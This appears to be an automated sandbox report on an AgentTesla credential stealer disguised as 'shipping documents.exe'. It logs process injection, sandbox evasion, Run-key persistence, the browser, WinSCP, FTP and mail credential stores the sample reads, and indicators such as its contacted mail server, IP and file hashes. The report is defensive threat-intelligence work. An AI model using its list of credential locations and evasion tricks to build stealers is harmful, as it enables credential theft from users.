Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\shipping documents.exe

API/Special instruction interceptor: Address: 3F6A6CC

Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Memory allocated: 21B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Memory allocated: 23B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Memory allocated: 22D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Memory allocated: BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Memory allocated: 2740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Memory allocated: 4740000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Window / User API: threadDelayed 2942

Jump to behavior

Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7944	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8068	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: RegSvcs.exe, 00000002.00000002.2698460729.00000000065A6000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\shipping documents.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\shipping documents.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1129008

Jump to behavior

Source: C:\Users\user\Desktop\shipping documents.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\shipping documents.exe"

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2696258750.0000000003312000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2696258750.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2696258750.000000000331A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2695267701.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7588, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2696258750.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2695267701.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7588, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2696258750.0000000003312000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2696258750.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2696258750.000000000331A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2695267701.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7588, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	211 Process Injection	1 Masquerading	2 OS Credential Dumping	211 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	1 Credentials in Registry	141 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	141 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	2 Data from Local System	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	211 Process Injection	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	124 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
shipping documents.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://account.dyn.com/	0%	URL Reputation	safe
http://mail.naveentour.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mail.naveentour.com	162.214.80.31	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://account.dyn.com/	RegSvcs.exe, 00000002.00000002.2695267701.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://mail.naveentour.com	RegSvcs.exe, 00000002.00000002.2696258750.000000000331A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.214.80.31	mail.naveentour.com	United States		46606	UNIFIEDLAYER-AS-1US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1520207
Start date and time:	2024-09-27 06:37:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	shipping documents.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@1/1
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 49 Number of non-executed functions: 4
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target boqXv.exe, PID 7884 because it is empty
Execution Graph export aborted for target boqXv.exe, PID 8012 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: shipping documents.exe

Simulations

Behavior and APIs

Time	Type	Description
00:38:11	API Interceptor	16x Sleep call for process: RegSvcs.exe modified
06:38:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run boqXv C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
06:38:22	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run boqXv C:\Users\user\AppData\Roaming\boqXv\boqXv.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.214.80.31	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	FormBook	Browse	www.jankarbaniye.com/b0y1/?6lW=1U5PN8N6yuNxFbnRAin6Tz5RwyKEa7xk32QpIpyTbdO3G4GoDzxHmgdPjrccGNMrxl/A&w8nHM=JBtTrRP

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mail.naveentour.com	shipping documents.exe	Get hash	malicious	AgentTesla	Browse	162.214.80.31
	Shipping Document.exe	Get hash	malicious	AgentTesla	Browse	162.214.80.31
	yq5xNPpWCT.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	162.214.80.31
	AWB#5305323204643.scr.exe	Get hash	malicious	AgentTesla	Browse	162.214.80.31
	AWB#5305323204643.scr.exe	Get hash	malicious	AgentTesla	Browse	162.214.80.31
	DHL INVOICE.scr.exe	Get hash	malicious	AgentTesla	Browse	162.214.80.31
	DHL INVOICE.scr.exe	Get hash	malicious	AgentTesla	Browse	162.214.80.31
	Purchase Order.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	162.214.80.31
	shipping document.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	162.214.80.31

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNIFIEDLAYER-AS-1US	http://novo.oratoriomariano.com/novo/	Get hash	malicious	Unknown	Browse	162.241.61.68
	http://direcprimviva.com/acessar.php	Get hash	malicious	Unknown	Browse	192.185.222.148
	https://novo.oratoriomariano.com/novo/99417/Entry.html	Get hash	malicious	Unknown	Browse	162.241.61.68
	https://novo.oratoriomariano.com/novo/11614/	Get hash	malicious	Unknown	Browse	162.241.61.68
	https://globaltechnicalsystems.lk/portal/post/dhlAr/	Get hash	malicious	Unknown	Browse	162.214.157.176
	http://alibinaadi.com/.well-known/alibaba/Alibaba/index.php	Get hash	malicious	Unknown	Browse	173.254.68.150
	https://novo.oratoriomariano.com/novo/45114/	Get hash	malicious	Unknown	Browse	162.241.61.68
	https://direcprimviva.com/acessar.php/	Get hash	malicious	Unknown	Browse	192.185.222.148
	http://novo.oratoriomariano.com/novo/94694/	Get hash	malicious	Unknown	Browse	162.241.61.68
	https://novo.oratoriomariano.com/novo/67388/	Get hash	malicious	Unknown	Browse	162.241.61.68

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	shipping documents.exe	Get hash	malicious	AgentTesla	Browse
	autorization Letter.exe	Get hash	malicious	AgentTesla	Browse
	rMT103SwiftCopyoFPayment.exe	Get hash	malicious	AgentTesla	Browse
	Shipping Document.exe	Get hash	malicious	AgentTesla	Browse
	COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exe	Get hash	malicious	AgentTesla	Browse
	DHL- CBJ520818836689.pdf.exe	Get hash	malicious	AgentTesla	Browse
	DHL- CBJ520818836689.exe	Get hash	malicious	AgentTesla	Browse
	Shipping documents.exe	Get hash	malicious	AgentTesla	Browse
	Shipping doc.exe	Get hash	malicious	AgentTesla	Browse
	80c619d931fa4e5c89fe87aac0b6b143.exe	Get hash	malicious	XWorm	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\boqXv.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	142
Entropy (8bit):	5.090621108356562
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
MD5:	8C0458BB9EA02D50565175E38D577E35
SHA1:	F0B50702CD6470F3C17D637908F83212FDBDB2F2
SHA-256:	C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
SHA-512:	804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Temp\Hezron

Download File

Process:	C:\Users\user\Desktop\shipping documents.exe
File Type:	data
Category:	dropped
Size (bytes):	241664
Entropy (8bit):	6.750267730366818
Encrypted:	false
SSDEEP:	6144:RGXTUV39ijawfIdV/BauxT1AGAOxCAbmRWxW:RYE39u3wdRBpB1A4bmwW
MD5:	917142792D2B2731E30192D41E91538E
SHA1:	280700CDF500D5753B076216DE82FC882316A8BD
SHA-256:	39ECEE4D47A3EC531431A487B66C305577D6262EB80CAF62A05297C620F64AEA
SHA-512:	09761E624D87857E777E50447E6DC7C76237E4CA23537CB1017F8D80B4C9B981637DD752A0BF4BA5B0E4F5BC1FED8A4CC295708ABAC728C3CCD5DA9D83782C38
Malicious:	false
Reputation:	low
Preview:	...VEZOA5FJB..1K.6COLGH9rN7X5XDG4VFZOA1FJBJH1KO6COLGH92N7X5X.G4VHE.O1.C.k.0....'%4hI@!PT5d$U8(5;aS#j0?&."!....g%VV+.U8R`G4VFZOAa.JB.I2K...LGH92N7X.XFF?WMZO.2FJJJH1KO6].OGH.2N7.6XDGtVFzOA1DJBNH1KO6COHGH92N7X5x@G4TFZOA1FHB..1K_6C_LGH9"N7H5XDG4VVZOA1FJBJH1K..@O.GH92.4Xs]DG4VFZOA1FJBJH1KO6COHGD92N7X5XDG4VFZOA1FJBJH1KO6COLGH92N7X5XDG4VFZOA1FJBJH1kO6KOLGH92N7X5XLg4V.ZOA1FJBJH1KaB&78GH9..4X5xDG4.EZOC1FJBJH1KO6COLGh92..F'G4V._OA1.IBJN1KO.@OLGH92N7X5XDGtVF.a3T%!JH=KO6COHGH;2N7.6XDG4VFZOA1FJB.H1.O6COLGH92N7X5XDG4.EZOA1F.BJH3KJ6{.NG..3N4X5XEG4PFZOA1FJBJH1KO6COLGH92N7X5XDG4VFZOA1FJBJH1KO6COLGU.....}f.:.\$].g.!.A.."..O..C.].IZ..~.I.....h47..B.G....J...L.F2!4....~:D0?..5eGP.R....ziMr..^[.>...8h./7b.k..ml...H<gj..,..'(Yx'?-Th.#,)C".4.NLGH9.....]...bB>X~P2....w]4...IX5X G4V4ZOAPFJB.H1K 